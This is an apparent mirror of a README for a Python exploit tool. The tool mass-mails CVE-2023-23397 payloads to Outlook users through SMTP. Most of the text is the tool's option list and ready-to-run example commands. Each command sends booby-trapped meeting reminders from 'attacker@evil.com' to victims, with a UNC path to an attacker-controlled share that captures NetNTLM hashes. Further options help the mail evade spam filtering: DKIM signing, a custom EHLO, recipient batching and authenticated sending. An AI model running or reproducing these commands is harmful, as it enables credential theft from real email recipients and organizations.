来源

关联漏洞

描述

Python script for sending e-mails with CVE-2023-23397 payload using SMTP

介绍

# CVE-2023-23397

This script allows to create TNEF-encoded Outlook e-mails with CVE-2023-23397 exploit payload and send them via pure SMTP - no need in COM objects or EWS.

I could not get `IPM.Schedule.Meeting.Request` message class to work properly (it generates both meeting and the reminder but does not respect `PidLidReminderOverride` property for some reason), so instead the script abuses `IPM.TaskRequest` class. It results into a malicious meeting reminder popup just like in the original exploit, but the recipient cannot view the message body nor the meeting details. In OWA, however, the e-mail looks like a regular message without an appointment.

Tested on Outlook365 16130.20218 and Outlook 2019 10395.20020. Note that TNEF attachment and headers may not make it through the antispam filters when sending the e-mails externally - I only tested this by sending e-mails directly (or via Postfix relay) to Exchange from the Linux machine in the same LAN.

## Usage

```
options:
  -h, --help            show this help message and exit
  -s SERVER, --server SERVER
                        smtp mail relay (host[:port]), default: localhost:25
  -f SENDER, --from SENDER
                        sender email address
  -t TO, --to TO        recipient email address(es), path to a file or comma-separated values
  -S SUBJECT, --subject SUBJECT
                        message subject
  -r ROOM, --room ROOM  meeting location (room name), default: Meeting Room #1
  -b BODY, --body BODY  plaintext message body (or path to file)
  --html HTML           HTML message body (or path to file)
  -p PATH, --path PATH  remote file path for NetNTLM exfiltration, e.g \\10.10.10.10\share\1.wav
  -a AUTH, --auth AUTH  username:password for AUTH command if authenticated send is required
  --codepage CODEPAGE   windows codepage (e.g. 1252=ASCII, 65001=Unicode) to encode HTML body (if any), default: 1252
  --ehlo EHLO, --helo EHLO
                        EHLO command argument (sender external hostname)
  -l LANG, --lang LANG  Content-Language header value, default: en-US
  --starttls            Use STARTTLS when communicating over plaintext SMTP
  --max-rcpts MAX_RCPTS
                        Maximum number of recipients per send attempt
  -v                    Enable debug output

DKIM message signing:
  --dkim-selector DKIM_SELECTOR
                        DKIM selector
  --dkim-key DKIM_KEY   DKIM private key file path
  --dkim-domain DKIM_DOMAIN
                        DKIM domain name, default: sender address part after @

```

## Examples

Send the e-mail from `attacker@evil.com` to `victim@example.com`:
```shell
python3 cve-2023-23397.py -s localhost:25 -p '\\xx.xx.xx.xx\share\1.wav' -f attacker@evil.com -t victim@example.com -S 'Test meeting' -b 'This is a test meeting, please ignore it.'
```

Send the e-mail to multiple recipients with opportunistic TLS and HTML body from file:
```shell
python3 cve-2023-23397.py -s mail.example.com:25 -p '\\xx.xx.xx.xx\share\1.wav' -f attacker@evil.com -t victim1@example.com,victim2@example.com -S 'Test meeting' -b 'This is a test meeting, please ignore it.' --html ./body.html --starttls
```

Send the e-mail with DKIM signature (requires `pip install dkimpy`) and custom domain in EHLO command to recipients loaded from file, three recipients per message:
```shell
python3 cve-2023-23397.py -s mail.example.com:25 -p '\\xx.xx.xx.xx\share\1.wav' -f attacker@evil.com -t ./recipients.txt -S 'Test Meeting' -b 'This is a test meeting, please ignore it.' --html ./body.html --starttls --max-rcpts 3 --dkim-key ./dkim.private --dkim-domain evil.com --dkim-selector default --ehlo mail.evil.com
```

Send the e-mail with domain credentials:
```shell
python3 cve-2023-23397.py -s mail.example.com:587 --auth 'EXAMPLE\attacker:12345678' -p '\\xx.xx.xx.xx\share\1.wav' -f attacker@example.com -t victim@example.com -S 'Test meeting' -b 'This is a test meeting, please ignore it.' --starttls
```

## Credits

- [Original research from MDSec](https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/)
- [tnefparse](https://github.com/koodaamo/tnefparse) for TNEF-related python code

文件快照

 [4.0K]  /data/pocs/43b430a532e0b7efe3aba8f8986da88cf9ed3a96
├── [ 18K]  cve-2023-23397.py
└── [4.1K]  README.md

0 directories, 2 files

备注